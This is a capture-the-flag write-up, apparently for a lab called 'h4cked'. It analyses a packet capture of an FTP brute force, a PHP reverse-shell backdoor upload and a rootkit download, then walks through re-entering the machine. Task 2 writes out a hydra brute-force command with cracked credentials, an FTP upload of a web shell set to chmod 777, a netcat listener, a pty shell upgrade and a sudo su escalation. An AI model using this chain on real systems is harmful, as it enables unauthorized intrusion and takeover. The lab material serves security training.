h4cked

Find out what happened while analyzing a .pcap file and hack your way into the machine.

Task 1: Oh no! We've been hacked!

To clear the SYN and ACK segments that do not have data of interest, use the command frame.len != 66 and frame.len != 74, with this we indicate that the frames with a size different to 66 and 74 do not show them, in my case they were the sizes of these segments that did not serve me at all.

This way everything is cleaner and "prettier" to the eyes.

The attacker is trying to log into a specific service. What service is this?

ftp

Aca vemos como el atacante esta intentando loggearse

There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?

hydra

The attacker is trying to log on with a specific username. What is the username?

jenny

Se ve como en el campo user

What is the user's password?

password123

Aca vemos como el usuario despues de introducir la contraseña "password123" el sistema le devuelve con un "Login successful"

What is the current FTP working directory after the attacker logged in?

/var/www/html

Cuando ejecuta el comando "pwd" podemos ver que le responde con un "/var/www/html"

The attacker uploaded a backdoor. What is the backdoor's filename?

shell.php

The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?

http://pentestmonkey.net/tools/php-reverse-shell

Which command did the attacker manually execute after getting a reverse shell?

whoami

What is the computer's hostname?

wir3

Which command did the attacker execute to spawn a new TTY shell?

python3 -c 'import pty; pty.spawn("/bin/bash")'

Which command was executed to gain a root shell?

sudo su

The attacker downloaded something from GitHub. What is the name of the GitHub project?

reptile

The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?

rootkit

Task 2: Hack your way back into the machine

1. Since the previous hacker changed the password we will have to do brute force against ftp using hydra.

// Some code$ hydra -l jenny -P /usr/share/wordlists/rockyou.txt 10.10.28.43 ftp
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-19 17:25:56
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.28.43:21/
[21][ftp] host: 10.10.28.43   login: jenny   password: 987654321
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-19 17:26:44

We see that the password is 987654321

1. We connect with the credentials, with the command put we upload our shell, and give it run permissions with. chmod 777

$ ftp 10.10.28.43
Connected to 10.10.28.43.
220 Hello FTP World!
Name (10.10.28.43:rulo): jenny
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||36440|)
150 Here comes the directory listing.
drwxr-xr-x    2 1000     1000         4096 May 19 20:39 .
drwxr-xr-x    3 0        0            4096 Feb 01  2021 ..
-rw-r--r--    1 1000     1000        10918 Feb 01  2021 index.html
-rwxrwxrwx    1 1000     1000         5493 Feb 01  2021 shell.php
226 Directory send OK.
ftp> put shellknz.php
local: shellknz.php remote: shellknz.php
229 Entering Extended Passive Mode (|||45093|)
150 Ok to send data.
100% |***************************************************************************|  2583       19.09 MiB/s    00:00 ETA
226 Transfer complete.
2583 bytes sent in 00:00 (5.17 KiB/s)
ftp> chmod 777 shellknz.php
200 SITE CHMOD command ok.
ftp> quit
221 Goodbye.

1. We tap with the command nc -lvnp 6666 and on the web we access our shell to run so it gives us the reverse shell.

1. Now all that's left is to upgrade to TTY with python3 -c 'import pty; pty.spawn("/bin/bash")', after that we change user to jenny using the same ftp credentials, and with sudo su we become root.